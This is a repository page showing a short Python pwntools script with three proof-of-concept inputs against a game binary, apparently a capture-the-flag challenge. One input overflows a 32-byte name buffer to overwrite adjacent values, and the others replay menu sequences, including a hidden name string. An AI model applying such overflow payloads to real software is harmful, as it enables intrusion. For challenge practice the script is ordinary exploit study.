Você não pode selecionar mais de 25 tópicos Os tópicos devem começar com uma letra ou um número, podem incluir traços ('-') e podem ter até 35 caracteres.

60 linhas
1.3 KiB

5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
5 anos atrás
  1. from pwn import process
  2. FILENAME = "./spell-warz-again-patched"
  3. def poc0():
  4. p = process(FILENAME)
  5. print p.recvuntil(">")
  6. p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
  7. print p.recvuntil(">")
  8. p.sendline("y")
  9. print p.recvuntil(">")
  10. p.sendline("2")
  11. print p.recvuntil(">")
  12. p.sendline("4")
  13. print p.recvuntil(">")
  14. p.sendline("y")
  15. for _ in xrange(10):
  16. print p.recvuntil(">")
  17. p.sendline("100")
  18. p.interactive()
  19. def poc1():
  20. p = process(FILENAME)
  21. print p.recvuntil(">")
  22. p.sendline("Leo")
  23. print p.recvuntil(">")
  24. p.sendline("y")
  25. print p.recvuntil(">")
  26. p.sendline("2")
  27. print p.recvuntil(">")
  28. p.sendline("4")
  29. print p.recvuntil(">")
  30. p.sendline("y")
  31. print p.recvuntil(">")
  32. p.sendline("0")
  33. p.interactive()
  34. def poc2():
  35. p = process(FILENAME)
  36. print p.recvuntil(">")
  37. p.sendline("__th3_w0rLd_D3str0Y3r__")
  38. print p.recvuntil(">")
  39. p.sendline("y")
  40. print p.recvuntil(">")
  41. p.sendline("2")
  42. p.interactive()
  43. print p.recvuntil(">")
  44. p.sendline("4")
  45. print p.recvuntil(">")
  46. p.sendline("y")
  47. for _ in xrange(10):
  48. print p.recvuntil(">")
  49. p.sendline("100")
  50. p.interactive()
  51. if __name__ == "__main__":
  52. poc2()